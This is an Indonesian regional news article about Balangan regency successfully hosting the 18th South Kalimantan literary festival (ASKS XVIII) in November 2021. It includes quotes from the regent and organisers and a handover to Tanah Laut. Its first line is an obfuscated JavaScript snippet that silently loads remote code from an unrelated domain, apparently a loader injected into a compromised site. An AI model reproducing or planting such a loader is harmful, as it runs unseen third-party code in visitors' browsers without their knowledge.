(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Balangan Sukses Gelar ASKS XVIII, Tahun Depan Bersua di Tanah Laut


KANALKALIMANTAN, PARINGIN – Kabupaten Balangan sukses menyelenggarakan Aruh Sastra Kalimantan Selatan (ASKS) XVIII di Gedung Budaya Balangan, 12-14 November 2021.

ASKS XVIII 2021 di Balangan diikuti 218 peserta dari seluruh Banua, perwakilan dari 13 Kabupaten/Kota se Kalimantan Selatan.

Bupati Balangan H Abdul Hadi sangat berterima kasih dan mengapresiasi karena Balangan dipercaya menjadi tuan rumah, dulunya pernah juga menjadi tuan rumah aruh sastra pada tahun 2008 silam.

H Abdul Hadi berharap gaung dari aruh sastra mampu mendorong kecintaan masyarakat terhadap sastra yang ada di Kalimantan Selatan.

 

 

Baca juga: Kronologi Laka Maut Yamaha R15 vs Supra X di Trikora, Satu Pemotor Tewas

“Mudah-mudahan ini menghasilkan karya sastra yang bisa dinikmati oleh warga Banua Kalimantan Selatan,” harap Abdul Hadi.

Sementara itu, mewakili Kabupaten Tanah Laut, Hadani secara pribadi acung jempol dan angkat topi untuk penyelenggaran yang sukses, meriah, dan luar biasa.

“Begitu juga pelayanan panitia, teknis acara yang kami lihat hampir tidak ada cacat dalam pelaksanaannya. Kekurangan pasti ada, tapi tidak terlalu kentara dan berhasil ditutupi dengan pelayanan ekstra lainnya. Ini juga menjadi bekal kami untuk menjadi tuan rumah ASKS tahun depan,” tukasnya.

Baca juga: Banjir Masih Kepung Kota Barabai, Pedagang Pasar Berjualan di Jalan Lintas Provinsi

Hadani menyambut antusias Kabupaten Tanah Laut menjadi tuan rumah pada ASKS XIX 2022 nanti. Menurutnya, menjadi sebuah kebanggaan bisa mengakomodir dan mengumpulkan para sastrawan Banua di Tanah Laut.

Sementara itu, Prapto, Ketua Panitia Pelaksana ASKS XVIII mengucapkan syukur atas selesainya gelaran ASKS di Balangan.

“Tentu kami berterima kasih kepada semua pihak yang sudah menyukseskan gelaran ini dan tentunya kepada peserta yang sudah bersedia datang ke Balangan untuk memeriahkan. Semoga ini menjadi pemicu kami terus semangat dalam memelihara khazanah kesenian dan kebudayaan di Balangan,” harapnya. (kanalkalimantan.com/alfi)

Reporter : alfi
Editor : kk


Risa

Recent Posts

Juara Umum di MTQ Provinsi, Ketua LPTQ Banjar Pastikan Bonus bagi Pemenang

KANALKALIMANTAN.COM, MARTAPURA - Kabupaten Banjar meraih sukses pada Musabaqah Tilawatil Quran (MTQ) Nasional XXXV Tingkat… Read More

1 jam ago

Pungut Sampah Suporter Timnas Pasca Nobar di Balai Kota Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Suporter setia Timnas Indonesia di Kota Banjarbaru Kalimantan Selatan (Kalsel) kompak membersihkan… Read More

3 jam ago

Sah! Ini Nama 45 Calon Terpilih Anggota DPRD Kabupaten Banjar 2024-2029

Golkar dan Gerindra Masing-masing 8 Kursi, PDIP, Partai Gelora, dan PBB Kebagian 1 Kursi Read More

4 jam ago

Tok! KPU Banjarbaru Sahkan 30 Calon Terpilih Anggota DPRD Kota Banjarbaru, Ini Daftar Lengkapnya

13 Kursi Diisi Pendatang Baru, 17 Petahana Bertahan di Gedung Dewan Read More

7 jam ago

Buka Musrenbang RPJD 2025 – 2045, Ini Harapan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar menggelar Musrenbang… Read More

14 jam ago

Mahasiswa Prodi Gizi Belajar Penyelesaian Sengketa Medis di RSD Idaman

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 49 mahasiswa Diploma III Program Studi Gizi Poltekkes Kemenkes Banjarmasin melaksanakan… Read More

16 jam ago

This website uses cookies.